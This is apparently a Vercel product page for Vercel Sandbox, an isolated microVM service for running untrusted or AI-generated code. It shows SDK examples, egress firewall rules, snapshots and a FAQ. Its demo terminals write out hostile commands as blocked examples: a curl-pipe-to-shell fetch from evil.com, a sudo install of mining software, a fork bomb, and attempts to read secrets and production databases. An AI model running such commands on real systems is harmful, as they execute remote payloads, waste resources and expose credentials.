Skip to content
Dashboard

The safest way to run code you didn’t write

Modern apps increasingly need to execute code they didn’t author. From AI agents, customer scripts, or dynamic systems.
Avoid unintended access to your environment variables, databases, and other secure environments.

Vercel Sandbox

# Production Environment: ✓ Protected
$ echo $API_SECRET
✗ Error: Undefined
$ psql $DATABASE_URL
✗ Error: Database connection blocked
$ aws s3 ls s3://prod-bucket
✗ Error: Cloud resources isolated
Protect against potentially unsafe network requests, unintended resource usage, and escalated privileges

Vercel Sandbox

# Attempted Commands: ✓ Blocked by Sandbox
$ curl http://evil.com/payload.sh | sh
✗ Error: External network access denied
$ sudo apt-get install mining-software
✗ Error: Privilege escalation not permitted
$ while true; do fork; done
✗ Error: Resource limits exceeded
Modern apps increasingly need to execute code they didn’t author. From AI agents, customer scripts, or dynamic systems.

Vercel Sandbox

// Run an AI agent's code securely in a sandboxed environment
const code = await agent.generateCode(prompt);
const sandbox = await Sandbox.create({ runtime: 'python3.13' });
const result = await sandbox.runCommand('python', ['-c', code]);
// Run an untrusted user-provided script
const userScript = await request.body.text();
const sandbox = await Sandbox.create({ timeout: ms('1m') });
await sandbox.runCommand('node', ['-e', userScript]);
Security

Network Firewall with Credentials Brokering and Requests Proxying

Control egress traffic with fine-grained network policies that can be updated at runtime. Credentials brokering injects secrets into outbound requests without exposing them inside the sandbox. Requests Proxying routes selected traffic to your own proxy server for additional security and observability.

  • Dynamic policies: allow-all, deny-all, or user-defined rules
  • Credentials injected on egress: never enter the sandbox
  • Route any request to your own proxy server
  • Live policy updates without restarting processes

Vercel Sandbox

const sandbox = await Sandbox.create({
networkPolicy: 'allow-all',
});
// Install dependencies with full network access
await sandbox.runCommand({ cmd: 'npm', args: ['install'] });
// Lock down network before running untrusted code
await sandbox.update({
networkPolicy: {
allow: {
'api.openai.com': [{
// Credentials injected on egress, never inside the sandbox
transform: [{ headers: { Authorization: 'Bearer $OPENAI_API_KEY' } }],
}],
'github.com': [{
// Proxy requests to any endpoint
forwardURL: 'https://my-proxy-server.company.com',
}],
// Allow wildcard domains for egress traffic
'*.vercel.app': [],
// Deny all other network traffic
},
},
});
Performance

Snapshots with Instant Environment Restore

Capture the complete state of a running sandbox (filesystem and installed packages), then restore it instantly. Share environments with teammates, checkpoint long-running tasks, or skip dependency installation entirely by snapshotting after setup.

  • Skip dependency installation on every run
  • Share identical environments with your team
  • Checkpoint progress on long-running tasks
  • Spin up multiple parallel instances from one snapshot

Vercel Sandbox

// Create a sandbox and set up your environment
const sandbox = await Sandbox.create();
await sandbox.runCommand('npm', ['install']);
await sandbox.runCommand('npm', ['run', 'build']);
// Capture the state as a snapshot
const snapshot = await sandbox.snapshot();
console.log('Snapshot created:', snapshot.snapshotId);
// Create new sandboxes instantly from the snapshot
const fast = await Sandbox.create({
source: { type: 'snapshot', snapshotId: snapshot.snapshotId },
});
// Spin up multiple parallel instances from the same snapshot
const runners = await Promise.all([
Sandbox.create({ source: { type: 'snapshot', snapshotId: snapshot.snapshotId } }),
Sandbox.create({ source: { type: 'snapshot', snapshotId: snapshot.snapshotId } }),
Sandbox.create({ source: { type: 'snapshot', snapshotId: snapshot.snapshotId } }),
]);

Cost-efficient, scalable execution with Fluid compute

Vercel Sandbox runs on Fluid compute, Vercel’s optimized execution model that scales CPU and memory dynamically across millions of executions.

With Active CPU pricing, you’re billed for CPU only when code is actively running, not during idle or wait time, resulting in up to 95% lower cost for workloads with bursty or I/O-bound patterns.

Vercel Sandbox expands what our frontend infrastructure can handle. We plan to rely on it more for running untrusted code in AI workflows and for integrating tools that cannot run in a Node.js serverless function.
Tudor GolubencoCTO, Xata
Cua lets teams run computer-use agents from their apps with 100+ compatible VLMs — agents operate real desktops backed by Vercel Sandbox. Next.js playground on Vercel; agents execute in Vercel Sandbox via Cua with logs, replays, and evals.
Francesco BonacciFounder, Cua

How much will it cost?

Estimate your monthly Vercel Sandbox costs. Adjust your workload settings and compare pricing across providers.

Get started

You can get started with Vercel Sandbox quickly and easily.

See more examples

Launch a secure, interactive sandbox environment in milliseconds.

$ npx sandbox create --connect

Quickly give Vercel Sandbox a try with your AI tool of choice.

Bootstrap a simple Node.js CLI that creates a Vercel sandbox. Use this code:

import { Sandbox } from '@vercel/sandbox';
const sandbox = await Sandbox.create();
const { exitCode } = await sandbox.runCommand({
cmd: 'node',
args: ['-e', 'process.exit(0)'],
});
console.log(exitCode === 0 ? 'ok' : 'failed');
await sandbox.stop();

Include auth setup (vercel login && vercel link) with error handling.

Frequently asked questions

What is Vercel Sandbox?
Vercel Sandbox is an on-demand, isolated Linux microVM that runs arbitrary code safely through an SDK or CLI.
Why use Sandbox instead of managing containers or VMs myself?
Sandbox gives you secure microVM isolation, built-in authentication and observability, and usage-based pricing without any infrastructure to maintain.
Can it run untrusted or AI-generated code safely?
Yes. Sandbox is purpose-built to execute untrusted or AI-generated code in fully isolated, short-lived environments.
How is isolation implemented?
Each sandbox runs inside a Firecracker microVM on the same infrastructure that powers Vercel's build system.
What runtimes are supported?
Node.js 22, 24, 26, and Python 3.13 are available. You can also import any OCI image instead of the builtin runtimes.
Can I install system packages and use sudo?
Yes. Each sandbox runs on Amazon Linux 2023 by default, so you can install packages with dnf and use sudo as needed.
Can I run Docker containers or use FUSE?
Yes. Sandboxes have full support for elevated privileges within the microVM, so you can run Docker containers and use FUSE as needed.
How long can a sandbox run?
Sandboxes run for 5 minutes by default, up to 24 hours on Pro and Enterprise plans and up to 45 minutes on Hobby plans, with programmatic extensions available.
What resources can I allocate?
Each sandbox can use up to 32 vCPUs on Enterprise plans, 8 vCPUs on Pro plans and 4 vCPUs on Hobby plans. RAM is provisioned at 2 GB per vCPU.
Can I expose a dev server or app on a public URL?
Yes. You can open up to 15 ports and access them through a sandbox URL, such as sandbox.domain(port).
How do I monitor what’s running?
You can view active sandboxes in the Sandboxes tab of your project with metrics under the Observability → Sandboxes tab, and stream real-time logs to your terminal.